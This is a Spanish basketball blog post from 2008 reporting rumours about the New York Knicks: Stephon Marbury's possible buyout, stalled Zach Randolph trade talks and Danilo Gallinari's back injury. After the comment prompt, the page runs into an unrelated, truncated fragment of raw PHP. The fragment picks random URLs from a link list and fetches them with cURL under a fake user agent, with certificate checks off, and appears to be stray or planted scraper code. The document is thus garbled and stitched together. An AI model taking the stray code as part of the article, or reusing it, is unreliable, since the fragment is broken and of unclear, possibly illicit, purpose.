Las oficinas de los Knicks echan humo

24 de September de 2008 por txusma

Y es que a falta de poco más deun mes de que el balón eche a rodar en el TD Banknorth Garden de Boston, Donnie Walsh y el resto de la junta directiva tienen entre manos muchos asuntos tremendamente candentes. El que está en boca de todos actualmente es el posible despido de Stephon Marbury y es que se rumorea que a final de esta misma semana los Knicks haránun BuyOut del contrato del base, permitiéndole a este firmar por cualquier equipo de la liga. A pesar del desmentido de la propia directiva y de la confirmación que Starbury estará en el training camp de Saratoga dentro de 10 días, lo cierto es que incluso circulan rumores de interés de algunos equipos como los Miami Heat. El despido pondría punto y final a la convulsa etapa de Marbury en los Knicks donde sus tensiones con Isiah Thomas fueran evidentes y constantes.

Otro tema sobre la mesa de Walsh es Zach Randolph. Si hace días informábamos de que el traspaso con Memphis a cambio de Darko Milicic y Marko Jaric era casi un hecho finalmente las conversaciones no han fructificado debido a la negativa de los Knicks en traspasar también una primera ronda. Recordemos que la primera ronda de 2010 de los Knicks ya no está en su poder ya que se la traspasaron a los Suns en el trade de… Stephon Marbury. De momento, Zach sigue en Gran Manzana a pesar de ser un secreto a voces que su entrenador no le quiere.

Durante los últimos días también han aflorado rumores sobre el estado de la espalda de Danilo Gallinari, elegido en la séptima posición del draft de este año, y lesionado en el primer partido de las ligas de verano, en lo que fue lo más destacado que hizo Robert ‘Tractor’ Traylor en su retorno a las pistas. Unas fuentes apunta que Gallinari aún no se ha recuperado y que llegará justo al inicio de la temporada, confirmando la opinión de los que decían que Gallinari era un jugador muy frágil, mientras que otras afirman que estará listo para el training camp. En 10 días tendremos la respuesta.

Pero si por si fuera poco aún hay más noticias relacionadas con los Knicks:

  • Allan Houston estará también (como en principio los 3 anteriores) en el training camp en el que sería su segundo intento para volver a las pistas.
  • Parece ser que los Knicks en un desesperado intento por sacar algo positivo de Marbury han contactado con los Bulls para conseguir un sign&trade con Ben Gordon pero la franquicia de Illinois, de momento, no está muy entusiasmado con la propuesta.
  • Debido a las lesiones crónicas que padece en sus rodillas y que han hecho que el año pasado tan solo disputara 2 partidos, los Knicks están intentando convencer a Jerome James para que se retire. Seguramente el gran contrato que le firmó Isiah Thomas es la razón de más peso que tiene James para no hacerlo.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>